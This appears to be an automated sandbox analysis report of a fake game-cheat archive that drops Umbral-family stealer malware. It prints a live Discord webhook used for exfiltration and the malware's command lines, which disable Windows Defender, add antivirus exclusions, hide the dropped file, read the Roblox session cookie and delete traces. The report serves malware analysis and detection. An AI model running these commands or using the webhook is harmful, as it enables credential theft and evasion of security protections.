Overview
overview
10Static
static
3OblivionCh....1.rar
windows7-x64
10OblivionCh....1.rar
windows10-2004-x64
1OblivionCh...s.admx
windows7-x64
3OblivionCh...s.admx
windows10-2004-x64
3OblivionCh...er.pdb
windows7-x64
3OblivionCh...er.pdb
windows10-2004-x64
3OblivionCh...ui.ini
windows7-x64
1OblivionCh...ui.ini
windows10-2004-x64
1OblivionCh...n.json
windows7-x64
3OblivionCh...n.json
windows10-2004-x64
3OblivionCh...ingw.h
windows7-x64
3OblivionCh...ingw.h
windows10-2004-x64
3OblivionCh...sert.h
windows7-x64
3OblivionCh...sert.h
windows10-2004-x64
3OblivionCh...onio.h
windows7-x64
3OblivionCh...onio.h
windows10-2004-x64
3OblivionCh...type.h
windows7-x64
3OblivionCh...type.h
windows10-2004-x64
3OblivionCh.../dir.h
windows7-x64
3OblivionCh.../dir.h
windows10-2004-x64
3OblivionCh...rect.h
windows7-x64
3OblivionCh...rect.h
windows10-2004-x64
3OblivionCh...rent.h
windows7-x64
3OblivionCh...rent.h
windows10-2004-x64
3OblivionCh.../dos.h
windows7-x64
3OblivionCh.../dos.h
windows10-2004-x64
3OblivionCh...rrno.h
windows7-x64
3OblivionCh...rrno.h
windows10-2004-x64
3OblivionCh...xcpt.h
windows7-x64
3OblivionCh...xcpt.h
windows10-2004-x64
3OblivionCh...cntl.h
windows7-x64
3OblivionCh...cntl.h
windows10-2004-x64
3Analysis
-
max time kernel
122s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
14-01-2025 21:10
Static task
static1
Behavioral task
behavioral1
Sample
OblivionCheatVIP 2.1.rar
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
OblivionCheatVIP 2.1.rar
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
OblivionCheatVIP 2.1/Addons/Microsoft/WinMaps.admx
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
OblivionCheatVIP 2.1/Addons/Microsoft/WinMaps.admx
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
OblivionCheatVIP 2.1/Addons/Zlib/6.5/Oblivion Client - Installer.pdb
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
OblivionCheatVIP 2.1/Addons/Zlib/6.5/Oblivion Client - Installer.pdb
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
OblivionCheatVIP 2.1/Addons/Zlib/6.5/imgui.ini
Resource
win7-20241010-en
Behavioral task
behavioral8
Sample
OblivionCheatVIP 2.1/Addons/Zlib/6.5/imgui.ini
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
OblivionCheatVIP 2.1/Addons/Zlib/6.5/login.json
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
OblivionCheatVIP 2.1/Addons/Zlib/6.5/login.json
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
OblivionCheatVIP 2.1/Compilers/tinycc/include/_mingw.h
Resource
win7-20240729-en
Behavioral task
behavioral12
Sample
OblivionCheatVIP 2.1/Compilers/tinycc/include/_mingw.h
Resource
win10v2004-20241007-en
Behavioral task
behavioral13
Sample
OblivionCheatVIP 2.1/Compilers/tinycc/include/assert.h
Resource
win7-20240903-en
Behavioral task
behavioral14
Sample
OblivionCheatVIP 2.1/Compilers/tinycc/include/assert.h
Resource
win10v2004-20241007-en
Behavioral task
behavioral15
Sample
OblivionCheatVIP 2.1/Compilers/tinycc/include/conio.h
Resource
win7-20240903-en
Behavioral task
behavioral16
Sample
OblivionCheatVIP 2.1/Compilers/tinycc/include/conio.h
Resource
win10v2004-20241007-en
Behavioral task
behavioral17
Sample
OblivionCheatVIP 2.1/Compilers/tinycc/include/ctype.h
Resource
win7-20241010-en
Behavioral task
behavioral18
Sample
OblivionCheatVIP 2.1/Compilers/tinycc/include/ctype.h
Resource
win10v2004-20241007-en
Behavioral task
behavioral19
Sample
OblivionCheatVIP 2.1/Compilers/tinycc/include/dir.h
Resource
win7-20240903-en
Behavioral task
behavioral20
Sample
OblivionCheatVIP 2.1/Compilers/tinycc/include/dir.h
Resource
win10v2004-20241007-en
Behavioral task
behavioral21
Sample
OblivionCheatVIP 2.1/Compilers/tinycc/include/direct.h
Resource
win7-20240903-en
Behavioral task
behavioral22
Sample
OblivionCheatVIP 2.1/Compilers/tinycc/include/direct.h
Resource
win10v2004-20241007-en
Behavioral task
behavioral23
Sample
OblivionCheatVIP 2.1/Compilers/tinycc/include/dirent.h
Resource
win7-20240729-en
Behavioral task
behavioral24
Sample
OblivionCheatVIP 2.1/Compilers/tinycc/include/dirent.h
Resource
win10v2004-20241007-en
Behavioral task
behavioral25
Sample
OblivionCheatVIP 2.1/Compilers/tinycc/include/dos.h
Resource
win7-20241010-en
Behavioral task
behavioral26
Sample
OblivionCheatVIP 2.1/Compilers/tinycc/include/dos.h
Resource
win10v2004-20241007-en
Behavioral task
behavioral27
Sample
OblivionCheatVIP 2.1/Compilers/tinycc/include/errno.h
Resource
win7-20240903-en
Behavioral task
behavioral28
Sample
OblivionCheatVIP 2.1/Compilers/tinycc/include/errno.h
Resource
win10v2004-20241007-en
Behavioral task
behavioral29
Sample
OblivionCheatVIP 2.1/Compilers/tinycc/include/excpt.h
Resource
win7-20240903-en
Behavioral task
behavioral30
Sample
OblivionCheatVIP 2.1/Compilers/tinycc/include/excpt.h
Resource
win10v2004-20241007-en
Behavioral task
behavioral31
Sample
OblivionCheatVIP 2.1/Compilers/tinycc/include/fcntl.h
Resource
win7-20240903-en
Behavioral task
behavioral32
Sample
OblivionCheatVIP 2.1/Compilers/tinycc/include/fcntl.h
Resource
win10v2004-20241007-en
General
-
Target
OblivionCheatVIP 2.1.rar
-
Size
45.5MB
-
MD5
e1bdb1bb87c0e037710f6305c54c969a
-
SHA1
9b9f9848036fb35395e50b515ed45169d6883436
-
SHA256
f139ed18bca38e4e61fa88f94f0a070d217df1c1f647191510253352724ea1b5
-
SHA512
d839d93fbf3547f84ea465f6e9423b5d70b70e840c9f2e0df906cb8f483ea58524c5c79f6badb1f9b2df7a0e7b640904ebca488e36a07dc2dd62edf0f74ccc13
-
SSDEEP
786432:u5r8IfJQOhn0irjgZzaSiI5RTbhVRaqm9hrb/CU0ItR8uZQouD:gRJhhnPruJXByqgPtR8uSD
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1326623157028913212/jlk5SjJembzYiYsGT0bg_70kMXYfak5GFsTDwPZEZQWRTYI4z_Kz9R6n4WKwU74BXibD
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/files/0x00070000000194e6-27.dat family_umbral behavioral1/memory/3068-31-0x0000000001070000-0x00000000010B0000-memory.dmp family_umbral -
Umbral family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1964 powershell.exe 836 powershell.exe 1960 powershell.exe 1516 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts svchost.exe -
Executes dropped EXE 4 IoCs
pid Process 1148 OblivionClient.exe 2792 TestingServer.exe 3004 Node.exe 3068 svchost.exe -
Loads dropped DLL 5 IoCs
pid Process 1148 OblivionClient.exe 1148 OblivionClient.exe 1148 OblivionClient.exe 1156 Process not Found 1156 Process not Found -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 10 discord.com 9 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language OblivionClient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1676 cmd.exe 1648 PING.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2108 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1648 PING.EXE -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 532 7zFM.exe 1816 powershell.exe 532 7zFM.exe 532 7zFM.exe 532 7zFM.exe 3068 svchost.exe 1964 powershell.exe 836 powershell.exe 1960 powershell.exe 2956 powershell.exe 1516 powershell.exe 532 7zFM.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 532 7zFM.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 532 7zFM.exe Token: 35 532 7zFM.exe Token: SeSecurityPrivilege 532 7zFM.exe Token: SeDebugPrivilege 1816 powershell.exe Token: SeDebugPrivilege 3068 svchost.exe Token: SeIncreaseQuotaPrivilege 2660 wmic.exe Token: SeSecurityPrivilege 2660 wmic.exe Token: SeTakeOwnershipPrivilege 2660 wmic.exe Token: SeLoadDriverPrivilege 2660 wmic.exe Token: SeSystemProfilePrivilege 2660 wmic.exe Token: SeSystemtimePrivilege 2660 wmic.exe Token: SeProfSingleProcessPrivilege 2660 wmic.exe Token: SeIncBasePriorityPrivilege 2660 wmic.exe Token: SeCreatePagefilePrivilege 2660 wmic.exe Token: SeBackupPrivilege 2660 wmic.exe Token: SeRestorePrivilege 2660 wmic.exe Token: SeShutdownPrivilege 2660 wmic.exe Token: SeDebugPrivilege 2660 wmic.exe Token: SeSystemEnvironmentPrivilege 2660 wmic.exe Token: SeRemoteShutdownPrivilege 2660 wmic.exe Token: SeUndockPrivilege 2660 wmic.exe Token: SeManageVolumePrivilege 2660 wmic.exe Token: 33 2660 wmic.exe Token: 34 2660 wmic.exe Token: 35 2660 wmic.exe Token: SeIncreaseQuotaPrivilege 2660 wmic.exe Token: SeSecurityPrivilege 2660 wmic.exe Token: SeTakeOwnershipPrivilege 2660 wmic.exe Token: SeLoadDriverPrivilege 2660 wmic.exe Token: SeSystemProfilePrivilege 2660 wmic.exe Token: SeSystemtimePrivilege 2660 wmic.exe Token: SeProfSingleProcessPrivilege 2660 wmic.exe Token: SeIncBasePriorityPrivilege 2660 wmic.exe Token: SeCreatePagefilePrivilege 2660 wmic.exe Token: SeBackupPrivilege 2660 wmic.exe Token: SeRestorePrivilege 2660 wmic.exe Token: SeShutdownPrivilege 2660 wmic.exe Token: SeDebugPrivilege 2660 wmic.exe Token: SeSystemEnvironmentPrivilege 2660 wmic.exe Token: SeRemoteShutdownPrivilege 2660 wmic.exe Token: SeUndockPrivilege 2660 wmic.exe Token: SeManageVolumePrivilege 2660 wmic.exe Token: 33 2660 wmic.exe Token: 34 2660 wmic.exe Token: 35 2660 wmic.exe Token: SeDebugPrivilege 1964 powershell.exe Token: SeDebugPrivilege 836 powershell.exe Token: SeDebugPrivilege 1960 powershell.exe Token: SeDebugPrivilege 2956 powershell.exe Token: SeIncreaseQuotaPrivilege 1404 wmic.exe Token: SeSecurityPrivilege 1404 wmic.exe Token: SeTakeOwnershipPrivilege 1404 wmic.exe Token: SeLoadDriverPrivilege 1404 wmic.exe Token: SeSystemProfilePrivilege 1404 wmic.exe Token: SeSystemtimePrivilege 1404 wmic.exe Token: SeProfSingleProcessPrivilege 1404 wmic.exe Token: SeIncBasePriorityPrivilege 1404 wmic.exe Token: SeCreatePagefilePrivilege 1404 wmic.exe Token: SeBackupPrivilege 1404 wmic.exe Token: SeRestorePrivilege 1404 wmic.exe Token: SeShutdownPrivilege 1404 wmic.exe Token: SeDebugPrivilege 1404 wmic.exe Token: SeSystemEnvironmentPrivilege 1404 wmic.exe Token: SeRemoteShutdownPrivilege 1404 wmic.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 532 7zFM.exe 532 7zFM.exe 532 7zFM.exe -
Suspicious use of WriteProcessMemory 59 IoCs
description pid Process procid_target PID 532 wrote to memory of 1148 532 7zFM.exe 31 PID 532 wrote to memory of 1148 532 7zFM.exe 31 PID 532 wrote to memory of 1148 532 7zFM.exe 31 PID 532 wrote to memory of 1148 532 7zFM.exe 31 PID 1148 wrote to memory of 1816 1148 OblivionClient.exe 32 PID 1148 wrote to memory of 1816 1148 OblivionClient.exe 32 PID 1148 wrote to memory of 1816 1148 OblivionClient.exe 32 PID 1148 wrote to memory of 1816 1148 OblivionClient.exe 32 PID 1148 wrote to memory of 2792 1148 OblivionClient.exe 34 PID 1148 wrote to memory of 2792 1148 OblivionClient.exe 34 PID 1148 wrote to memory of 2792 1148 OblivionClient.exe 34 PID 1148 wrote to memory of 2792 1148 OblivionClient.exe 34 PID 1148 wrote to memory of 3004 1148 OblivionClient.exe 35 PID 1148 wrote to memory of 3004 1148 OblivionClient.exe 35 PID 1148 wrote to memory of 3004 1148 OblivionClient.exe 35 PID 1148 wrote to memory of 3004 1148 OblivionClient.exe 35 PID 1148 wrote to memory of 3068 1148 OblivionClient.exe 37 PID 1148 wrote to memory of 3068 1148 OblivionClient.exe 37 PID 1148 wrote to memory of 3068 1148 OblivionClient.exe 37 PID 1148 wrote to memory of 3068 1148 OblivionClient.exe 37 PID 3068 wrote to memory of 2660 3068 svchost.exe 38 PID 3068 wrote to memory of 2660 3068 svchost.exe 38 PID 3068 wrote to memory of 2660 3068 svchost.exe 38 PID 3068 wrote to memory of 1956 3068 svchost.exe 41 PID 3068 wrote to memory of 1956 3068 svchost.exe 41 PID 3068 wrote to memory of 1956 3068 svchost.exe 41 PID 3068 wrote to memory of 1964 3068 svchost.exe 43 PID 3068 wrote to memory of 1964 3068 svchost.exe 43 PID 3068 wrote to memory of 1964 3068 svchost.exe 43 PID 3068 wrote to memory of 836 3068 svchost.exe 45 PID 3068 wrote to memory of 836 3068 svchost.exe 45 PID 3068 wrote to memory of 836 3068 svchost.exe 45 PID 3068 wrote to memory of 1960 3068 svchost.exe 47 PID 3068 wrote to memory of 1960 3068 svchost.exe 47 PID 3068 wrote to memory of 1960 3068 svchost.exe 47 PID 3068 wrote to memory of 2956 3068 svchost.exe 49 PID 3068 wrote to memory of 2956 3068 svchost.exe 49 PID 3068 wrote to memory of 2956 3068 svchost.exe 49 PID 3068 wrote to memory of 1404 3068 svchost.exe 51 PID 3068 wrote to memory of 1404 3068 svchost.exe 51 PID 3068 wrote to memory of 1404 3068 svchost.exe 51 PID 3068 wrote to memory of 2220 3068 svchost.exe 53 PID 3068 wrote to memory of 2220 3068 svchost.exe 53 PID 3068 wrote to memory of 2220 3068 svchost.exe 53 PID 3068 wrote to memory of 820 3068 svchost.exe 55 PID 3068 wrote to memory of 820 3068 svchost.exe 55 PID 3068 wrote to memory of 820 3068 svchost.exe 55 PID 3068 wrote to memory of 1516 3068 svchost.exe 57 PID 3068 wrote to memory of 1516 3068 svchost.exe 57 PID 3068 wrote to memory of 1516 3068 svchost.exe 57 PID 3068 wrote to memory of 2108 3068 svchost.exe 59 PID 3068 wrote to memory of 2108 3068 svchost.exe 59 PID 3068 wrote to memory of 2108 3068 svchost.exe 59 PID 3068 wrote to memory of 1676 3068 svchost.exe 61 PID 3068 wrote to memory of 1676 3068 svchost.exe 61 PID 3068 wrote to memory of 1676 3068 svchost.exe 61 PID 1676 wrote to memory of 1648 1676 cmd.exe 63 PID 1676 wrote to memory of 1648 1676 cmd.exe 63 PID 1676 wrote to memory of 1648 1676 cmd.exe 63 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 1956 attrib.exe
Processes
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\OblivionCheatVIP 2.1.rar"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:532 -
C:\Users\Admin\AppData\Local\Temp\7zO4124E317\OblivionClient.exe"C:\Users\Admin\AppData\Local\Temp\7zO4124E317\OblivionClient.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1148 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAYQBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGMAZgBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHkAYgB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAYgBhACMAPgA="3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1816
-
-
C:\Users\Admin\AppData\Local\Temp\TestingServer.exe"C:\Users\Admin\AppData\Local\Temp\TestingServer.exe"3⤵
- Executes dropped EXE
PID:2792
-
-
C:\Users\Admin\AppData\Local\Temp\Node.exe"C:\Users\Admin\AppData\Local\Temp\Node.exe"3⤵
- Executes dropped EXE
PID:3004
-
-
C:\Users\Admin\AppData\Local\Temp\svchost.exe"C:\Users\Admin\AppData\Local\Temp\svchost.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3068 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2660
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\svchost.exe"4⤵
- Views/modifies file attributes
PID:1956
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\svchost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1964
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 24⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:836
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1960
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2956
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1404
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory4⤵PID:2220
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵PID:820
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1516
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name4⤵
- Detects videocard installed
PID:2108
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\svchost.exe" && pause4⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:1676 -
C:\Windows\system32\PING.EXEping localhost5⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1648
-
-
-
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"1⤵PID:1996
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Obfuscated Files or Information
1Command Obfuscation
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
41.8MB
MD595a3e8c1d4a5c7bd87a123b5cccb9f67
SHA1152bca2603e39111cc446692d8a29501d980def9
SHA256aa3765a7cfa4a5430c350c0d44252216c215c3fb3ffdf793cbef71dea633bdd8
SHA5128c9663f0f7700dd71475e9bad481e38a1131c636181ca768c4b9016c5e6e233131a37ab5e100b6c071459ef4ee6a7ace6eb22bd671cf5b0c8ded61e6ac8387d1
-
Filesize
3.7MB
MD554980c00c99dd31da947a704034250e4
SHA10388dcb527b4df85048593fb1fe324461ac2539b
SHA256efe6e5da039480336cc51d61970eb7ca5b0c10bc315c083f3cd08f81fb5fa7e6
SHA5123e2202658a8a44d994a34dfa5ae2b7de4d539713424f6e9047401847e003df6daf06848c405584e2c0ac7f80c421d708caf0b82f6995e720060a2662c18fd20c
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\40ILQU3WRTHO5V5KALFR.temp
Filesize7KB
MD5df623a2990c1bead9ff6499b13c2e565
SHA1ecfa639f276f0a55a68b55b611469ab79f47047f
SHA2569c9f2c6f82e48559ff69f25f268eb617053a918cda4494debf5ccd01d7bbfd19
SHA5120e01fc3d81e9a39a36aaf93e2759f8fa650b4afeb98ad413f76819cd48a8093c0d54eede8dc0d737ab15846bb03f1f58c90aa42048107668ee05e846f733a541
-
Filesize
37.2MB
MD50596379d69afdfe2534fad7584914d1f
SHA134cafd2ac2fb94c4981ef903c974e0f463d0a0e8
SHA2566ae88823ed9ebb76bd63babd61b7dfe6ac9168b2284f32f4b657ebe448b742ca
SHA51217d8ab7db5186d3c77e5ff949bd63bd7b5a31a3891cb757340465ad1df308917c939305218b5448db9f109a61702eb054d6182eecdcba1ba2eb268a10568b932
-
Filesize
229KB
MD574a87327b20292e3a514a2edd1f91c2c
SHA1d4a38972946d2a8ce32d375b4781e2f09ecc5368
SHA2567d3e8efdb9cc50120a910f17ed69a6edafd03a6d8ef2765f07e974bab5d6c7a2
SHA512effa857d12d0d955504013525aab1f75bd0e48e958e82b4822ecaab3333176b80c4a107934a11525b791f77f4126cc5db863f841c6cb6c3db3ea679514cb4eec